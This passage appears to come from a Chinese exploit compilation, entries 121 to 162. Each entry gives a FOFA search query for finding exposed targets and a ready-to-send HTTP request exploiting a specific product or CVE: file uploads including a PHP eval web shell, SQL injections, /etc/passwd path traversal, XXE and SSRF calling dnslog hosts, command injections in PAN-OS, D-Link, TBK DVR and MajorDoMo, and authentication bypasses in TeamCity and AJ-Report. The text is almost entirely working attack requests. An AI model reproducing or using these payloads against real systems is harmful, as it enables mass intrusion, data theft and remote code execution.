Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 597
Origin: https://ip:port
Referer: https://ip:port/sysmanage/licence.php
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="file_upload"; filename="2.php"
Content-Type: application/octet-stream

<?php phpinfo()?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="mode"

import
-----------------------------42328904123665875270630079328--


The uploaded file is written to /upload/2.php.

121. Beijing Byzoro (北京百绰) Smart S42 management platform userattestation.php arbitrary file upload
CVE-2024-1918
FOFA:title="Smart管理平台"
POST /useratte/userattestation.php HTTP/1.1
Host: 192.168.40.130:8443
Cookie: PHPSESSID=2174712c6aeda51c4fb6e6c5e6aaac50
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------42328904123665875270630079328
Content-Length: 592
Origin: https://192.168.40.130:8443
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers
Connection: close

-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="web_img"; filename="1.php"
Content-Type: application/octet-stream

<?php phpinfo();?>
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="id_type"

1
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="1_ck"

1_radhttp
-----------------------------42328904123665875270630079328
Content-Disposition: form-data; name="hidwel"

set
-----------------------------42328904123665875270630079328--

The uploaded file is written to boot/web/upload/weblogo/1.php.
122. 北京百绰 Smart S200 management platform /importexport.php SQL injection
CVE-2024-2771
FOFA:title="Smart管理平台"
Here sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk= is the SQL statement base64-encoded; decoded it reads sql=select 1,database(),version()
GET /importexport.php?sql=c2VsZWN0IDEsZGF0YWJhc2UoKSx2ZXJzaW9uKCk=&type=exportexcelbysql HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=f20e837c8024f47058ad2f689873dfc0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

123. Atlassian Confluence template injection code execution
FOFA:app="ATLASSIAN-Confluence" && body="由 Atlassian 合流8.5.3"
POST /template/aui/text-inline.vm HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.6045.159 Safari/537.36
Connection: close
Content-Type: application/x-www-form-urlencoded

label=\u0027%2b#request\u005b\u0027.KEY_velocity.struts2.context\u0027\u005d.internalGet(\u0027ognl\u0027).findValue(#parameters.x,{})%2b\u0027&x=@org.apache.struts2.ServletActionContext@getResponse().setHeader('X-Cmd-Response',(new freemarker.template.utility.Execute()).exec({"id"}))

124. 湖南建研 engineering quality inspection system arbitrary file upload
FOFA:body="/Content/Theme/Standard/webSite/login.css"
POST /Scripts/admintool?type=updatefile HTTP/1.1
Host: 192.168.40.130:8282
User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Content-Length: 72
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close
Content-Type: application/x-www-form-urlencoded

filePath=abcgcg.aspx&fileContent=<%Response.Write("Hello,World")%>

Uploaded file: http://192.168.40.130:8282/Scripts/abcgcg.aspx

125. ConnectWise ScreenConnect authentication bypass
CVE-2024-1709
FOFA:icon_hash="-82958153"
https://github.com/watchtowrlabs ... bypass-add-user-poc

Usage
python watchtowr-vs-ConnectWise_2024-02-21.py --url http://localhost --username hellothere --password admin123!

After the user has been created, log in to the admin console directly; system commands can then be executed.

126. aiohttp path traversal
FOFA:title=="ComfyUI"
GET /static/../../../../../etc/passwd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

127. Glodon (广联达) Linkworks DataExchange.ashx XXE
FOFA:body="Services/Identification/login.ashx"
POST /GB/LK/Document/DataExchange/DataExchange.ashx HTTP/1.1
Host: 192.168.40.130:8888
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.5790.171 Safari/537.36
Content-Length: 415
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: multipart/form-data;boundary=----WebKitFormBoundaryJGgV5l5ta05yAIe0
Purpose: prefetch
Sec-Purpose: prefetch;prerender

------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="SystemName"

BIM
------WebKitFormBoundaryJGgV5l5ta05yAIe0
Content-Disposition: form-data;name="Params"
Content-Type: text/plain

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [
<!ENTITY t SYSTEM "http://c2vkbwbs.dnslog.pw">
]>
<test>&t;</test>
------WebKitFormBoundaryJGgV5l5ta05yAIe0--

128. Adobe ColdFusion deserialization
CVE-2023-38203
Adobe ColdFusion versions 2018u17 (and earlier), 2021u7 (and earlier) and 2023u1 (and earlier)
FOFA:app="Adobe-ColdFusion"
PAYLOAD

129. Adobe ColdFusion arbitrary file read
CVE-2024-20767
FOFA:app="Adobe-ColdFusion" && title=="Error Occurred While Processing Request"
Step 1: obtain the uuid
GET /CFIDE/adminapi/_servermanager/servermanager.cfc?method=getHeartBeat HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close

Step 2: read the /etc/passwd file
GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept: */*
Accept-Encoding: gzip, deflate
Connection: close
uuid: 85f60018-a654-4410-a783-f81cbd5000b9

130. Laykefu customer service system arbitrary file upload
FOFA:icon_hash="-334624619"
POST /admin/users/upavatar.html HTTP/1.1
Host: 127.0.0.1
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36 Edg/107.0.1418.26
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary3OCVBiwBVsNuB2kR
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: user_name=1; user_id=3
Connection: close

------WebKitFormBoundary3OCVBiwBVsNuB2kR
Content-Disposition: form-data; name="file"; filename="1.php"
Content-Type: image/png

<?php phpinfo();@eval($_POST['sec']);?>
------WebKitFormBoundary3OCVBiwBVsNuB2kR--

131. Mini-Tmall <=20231017 SQL injection
FOFA:icon_hash="-2087517259"
Admin console address: http://localhost:8080/tmall/admin
http://localhost:8080/tmall/admin/user/1/1?orderBy=7,if((length(database())=11),SLEEP(3),0)

132. JetBrains TeamCity 2023.11.3 and earlier authentication bypass
CVE-2024-27198
FOFA:body="Log in to TeamCity"
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1
Host: 192.168.40.130:8111
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: */*
Content-Type: application/json
Accept-Encoding: gzip, deflate

{"username": "用户名", "password": "密码", "email": "test@mydomain.com", "roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}

CVE-2024-27199
/res/../admin/diagnostic.jsp
/.well-known/acme-challenge/../../admin/diagnostic.jsp
/update/../admin/diagnostic.jsp

CVE-2024-27198-RCE.py

133. H5 cloud mall (云商城) file.php file upload
FOFA:body="/public/qbsp.php"
POST /admin/commodtiy/file.php?upload=1 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36(KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryFQqYtrIWb8iBxUCx

------WebKitFormBoundaryFQqYtrIWb8iBxUCx
Content-Disposition: form-data; name="file"; filename="rce.php"
Content-Type: application/octet-stream

<?php system("cat /etc/passwd");unlink(__FILE__);?>
------WebKitFormBoundaryFQqYtrIWb8iBxUCx--

134. Netentsec (网康) NS-ASG application security gateway index.php SQL injection
CVE-2024-2330
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
POST /protocol/index.php HTTP/1.1
Host: x.x.x.x
Cookie: PHPSESSID=bfd2e9f9df564de5860117a93ecd82de
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/110.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 263

jsoncontent={"protocolType":"addmacbind","messagecontent":["{\"BandIPMacId\":\"1\",\"IPAddr\":\"eth0'and(updatexml(1,concat(0x7e,(select+version())),1))='\",\"MacAddr\":\"\",\"DestIP\":\"\",\"DestMask\":\"255.255.255.0\",\"Description\":\"Sample+Description\"}"]}

135. Netentsec (网康) NS-ASG application security gateway list_ipAddressPolicy.php SQL injection
CVE-2024-2022
Netentsec NS-ASG Application Security Gateway version 6.3
FOFA:app="网康科技-NS-ASG安全网关"
GET /admin/list_ipAddressPolicy.php?GroupId=-1+UNION+ALL+SELECT+EXTRACTVALUE(1,concat(0x7e,(select+md5(102103122)),0x7e)) HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

136. NextChat cors SSRF
CVE-2023-49785
FOFA:title="NextChat"
GET /api/cors/http:%2f%2fnextchat.kr9dqoau.dnslog.pw%23 HTTP/1.1
Host: x.x.x.x:10000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

137. Fujian Kirisun (福建科立讯) communication command and dispatch platform down_file.php SQL injection
CVE-2024-2620
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/down_file.php?uuid=1%27%20AND%20(SELECT%205587%20FROM%20(SELECT(SLEEP(5)))pwaA)%20AND%20%27dDhF%27=%27dDhF HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=uksj
Upgrade-Insecure-Requests: 1

138. Fujian Kirisun (福建科立讯) communication command and dispatch platform pwd_update.php SQL injection
CVE-2024-2621
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/user/pwd_update.php?usr_number=1%27%20AND%20(SELECT%207872%20FROM%20(SELECT(SLEEP(5)))DHhu)%20AND%20%27pMGM%27=%27pMGM&new_password=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

139. Fujian Kirisun (福建科立讯) communication command and dispatch platform editemedia.php SQL injection
CVE-2024-2622
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/editemedia.php?enterprise_uuid=1%27%20AND%20(SELECT%203257%20FROM%20(SELECT(SLEEP(5)))JPVs)%20AND%20%27gDyM%27=%27gDyM HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: PHPSESSID=d62411cd4ada228583bbcae45f099567; authcode=cybk
Upgrade-Insecure-Requests: 1

140. Fujian Kirisun (福建科立讯) communication command and dispatch platform get_extension_yl.php SQL injection
CVE-2024-2566
FOFA:body="app/structure/departments.php" || app="指挥调度管理平台"
GET /api/client/get_extension_yl.php?imei=1%27%20AND%20(SELECT%207545%20FROM%20(SELECT(SLEEP(5)))Zjzw)%20AND%20%27czva%27=%27czva&timestamp=1&sign=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Cookie: authcode=h8g9
Upgrade-Insecure-Requests: 1

141. Fujian Kirisun (福建科立讯) communication command and dispatch management platform ajax_users.php SQL injection
FOFA:body="指挥调度管理平台"
POST /app/ext/ajax_users.php HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:5.0) Gecko/20100101 Firefox/5.0 info
Content-Type: application/x-www-form-urlencoded

dep_level=1') UNION ALL SELECT NULL,CONCAT(0x7e,md5(1),0x7e),NULL,NULL,NULL-- -

142. CMSV6 vehicle monitoring platform weak password
CVE-2024-29666
FOFA:body="/808gps/"
admin/admin

143. Netis WF2780 v2.1.40144 remote command execution
CVE-2024-25850
FOFA:title='AP setup' && header='netis'
PAYLOAD

144. D-Link nas_sharing.cgi command injection
FOFA:app="D_Link-DNS-ShareCenter"
The system parameter carries the command to be executed (base64-encoded)
GET /cgi-bin/nas_sharing.cgi?user=mydlinkBRionyg&passwd=YWJjMTIzNDVjYmE&cmd=15&system=aWQ= HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:47.0) Gecko/20100101 Firefox/47.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

145. Palo Alto Networks PAN-OS GlobalProtect command injection
CVE-2024-3400
FOFA:icon_hash="-631559155"
GET /global-protect/login.esp HTTP/1.1
Host: 192.168.30.112:1005
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Connection: close
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`curl${IFS}dnslog地址`;
Accept-Encoding: gzip

146. MajorDoMo thumb.php unauthenticated remote code execution
CNVD-2024-02175
FOFA:app="MajordomoSL"
GET /modules/thumb/thumb.php?url=cnRzcDovL2EK&debug=1&transport=%7C%7C+%28echo+%27%5BS%5D%27%3B+id%3B+echo+%27%5BE%5D%27%29%23%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36 Edg/92.0.902.84
Accept-Charset: utf-8
Accept-Encoding: gzip, deflate
Connection: close

147. RaidenMAILD mail server v.4.9.4 path traversal
CVE-2024-32399
FOFA:body="RaidenMAILD"
GET /webeditor/../../../windows/win.ini HTTP/1.1
Host: 127.0.0.1:81
Cache-Control: max-age=0
Connection: close

148. CrushFTP authentication bypass via template injection
CVE-2024-4040
FOFA:body="CrushFTP"
PAYLOAD

149. AJ-Report open-source data dashboard remote command execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"ipconfig\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

150. AJ-Report 1.4.0 authentication bypass and remote code execution
FOFA:title="AJ-Report"
POST /dataSetParam/verification;swagger-ui/ HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Content-Type: application/json;charset=UTF-8
Connection: close
Content-Length: 339

{"ParamName":"","paramDesc":"","paramType":"","sampleItem":"1","mandatory":true,"requiredFlag":1,"validationRules":"function verification(data){a = new java.lang.ProcessBuilder(\"id\").start().getInputStream();r=new java.io.BufferedReader(new java.io.InputStreamReader(a));ss='';while((line = r.readLine()) != null){ss+=line};return ss;}"}

151. AJ-Report 1.4.1 pageList SQL injection
FOFA:title="AJ-Report"
GET /;swagger-ui/dataSource/pageList?showMoreSearch=false&pageNumber=1&pageSize=10 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Accept-Encoding: gzip

152. Progress Kemp LoadMaster remote command execution
CVE-2024-1212
LoadMaster <= 7.2.59.2 (GA)
LoadMaster <= 7.2.54.8 (LTSF)
LoadMaster <= 7.2.48.10 (LTS)
FOFA:body="LoadMaster"
JztsczsnOmRvZXNub3RtYXR0ZXI= is the base64 encoding of ';ls;':doesnotmatter
GET /access/set?param=enableapi&value=1 HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/604.1 (KHTML, like Gecko) Version/9.1.2 Safari/604.1
Connection: close
Accept: */*
Accept-Language: en
Authorization: Basic JztsczsnOmRvZXNub3RtYXR0ZXI=
Accept-Encoding: gzip

153. Gradio arbitrary file read
CVE-2024-1561
FOFA:body="__gradio_mode__"
Step 1: request /config to obtain the component ids
http://x.x.x.x/config

Step 2: write the contents of /etc/passwd into a temporary file
POST /component_server HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/14.1.3 Safari/605.1.15 Ddg/14.1.3
Connection: close
Content-Length: 115
Content-Type: application/json
Accept-Encoding: gzip

{"component_id": "1","data": "/etc/passwd","fn_name": "move_resource_to_block_cache","session_hash": "aaaaaaaaaaa"}

Step 3: access the temporary file
http://x.x.x.x/file=/tmp/gradio/ ... 8cdf49755073/passwd

154. 天维尔 fire and rescue operations dispatch platform SQL injection
CVE-2024-3720
FOFA:body="天维尔信息科技股份有限公司" && title=="登入"
POST /twms-service-mfs/mfsNotice/page HTTP/1.1
Host: x.x.x.x
Content-Length: 106
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://x.x.x.x
Content-Type: application/json
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://x.x.x.x/twms-service-mfs/mfsNotice/page
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

{"currentPage":1,"pageSize":19,"query":{"gsdwid":"1f95b3ec41464ee8b8f223cc41847930') AND 7120=(SELECT 7120 FROM PG_SLEEP(5)) AND ('dZAi'='dZAi"},"hgubmt748n4":"="}

155. LyLme Spage (六零导航页) file.php arbitrary file upload
CVE-2024-34982
FOFA:title=="上网导航 - LyLme Spage"
POST /include/file.php HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:125.0) Gecko/20100101 Firefox/125.0
Connection: close
Content-Length: 232
Accept: application/json, text/javascript, */*; q=0.01
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Content-Type: multipart/form-data; boundary=---------------------------qttl7vemrsold314zg0f
X-Requested-With: XMLHttpRequest

-----------------------------qttl7vemrsold314zg0f
Content-Disposition: form-data; name="file"; filename="test.php"
Content-Type: image/png

<?php phpinfo();unlink(__FILE__);?>
-----------------------------qttl7vemrsold314zg0f--

Access the uploaded file to see the output: http://x.x.x.x/files/upload/img_664ab7fd14d2c.php

156. TBK DVR-4104/DVR-4216 OS command injection
CVE-2024-3721
FOFA:"Location: /login.rsp"
·TBK DVR-4104
·TBK DVR-4216
curl "http://<dvr_host>:<port>/device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=<URL_ENCODED_SHELL_COMMAND>" -H "Cookie: uid=1"

POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=echo%3B%20echo%20asrgkjh0%20%3E%20%2Fvar%2Fexample.txt%3B%20ls%20-l%20%2Fvar%3B%20echo%20----------------%3B%20cat%20%2Fvar%2Fexample.txt%3B HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Macintosh;T2lkQm95X0c= Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Connection: close
Content-Length: 0
Cookie: uid=1
Accept-Encoding: gzip

157. 美特CRM upload.jsp arbitrary file upload
CNVD-2023-06971
FOFA:body="/common/scripts/basic.js"
POST /develop/systparam/softlogo/upload.jsp?key=null&form=null&field=null&filetitle=null&folder=null HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
Content-Length: 709
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cache-Control: max-age=0
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1imovELzPsfzp5dN
Upgrade-Insecure-Requests: 1

------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="file"; filename="kjldycpvjrm.jsp"
Content-Type: application/octet-stream

nyhelxrutzwhrsvsrafb
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="key"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="form"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="field"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filetitile"

null
------WebKitFormBoundary1imovELzPsfzp5dN
Content-Disposition: form-data; name="filefolder"

null
------WebKitFormBoundary1imovELzPsfzp5dN--

http://x.x.x.x/userfile/default/userlogo/kjldycpvjrm.jsp

158. Mura CMS processAsyncObject SQL injection
CVE-2024-32640
FOFA:"Generator: Masa CMS"
POST /index.cfm/_api/json/v1/default/?method=processAsyncObject HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded

object=displayregion&contenthistid=x\'&previewid=1

159. 英飞达 (INFINITT) medical image archiving and communication system WebJobUpload arbitrary file upload
FOFA:"INFINITT" && (icon_hash="1474455751"|| icon_hash="702238928")
POST /webservices/WebJobUpload.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36
Content-Length: 1080
Accept-Encoding: gzip, deflate
Connection: close
Content-Type: text/xml; charset=utf-8
Soapaction: "http://rainier/jobUpload"

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<jobUpload xmlns="http://rainier">
<vcode>1</vcode>
<subFolder></subFolder>
<fileName>abcrce.asmx</fileName>
<bufValue>PAYLOAD</bufValue>
</jobUpload>
</soap:Body>
</soap:Envelope>

/1/abcrce.asmx/Cmdshell?Pass=Response.Write("Hello,World")

160. Sonatype Nexus Repository 3 directory traversal and file read
CVE-2024-4956
FOFA:title="Nexus Repository Manager"
GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

161. 科拓 intelligent parking fee system Webservice.asmx arbitrary file upload
FOFA:body="/KT_Css/qd_defaul.css"
Step 1: upload the file. The <fileName> field specifies the file name and the <fileFlow> field the file content, which must be base64-encoded.
POST /Webservice.asmx HTTP/1.1
Host: x.x.x.x
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.5249.62 Safari/537.36
Connection: close
Content-Length: 445
Content-Type: text/xml
Accept-Encoding: gzip

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
<soap:Body>
<UploadResume xmlns="http://tempuri.org/">
<ip>1</ip>
<fileName>../../../../dizxdell.aspx</fileName>
<fileFlow>andqbmFnc3phc3d1ZGh0bmhwYXc=</fileFlow>
<tag>3</tag>
</UploadResume>
</soap:Body>
</soap:Envelope>

http://x.x.x.x/dizxdell.aspx

162. 和丰 multimedia information publishing system QH.aspx arbitrary file upload
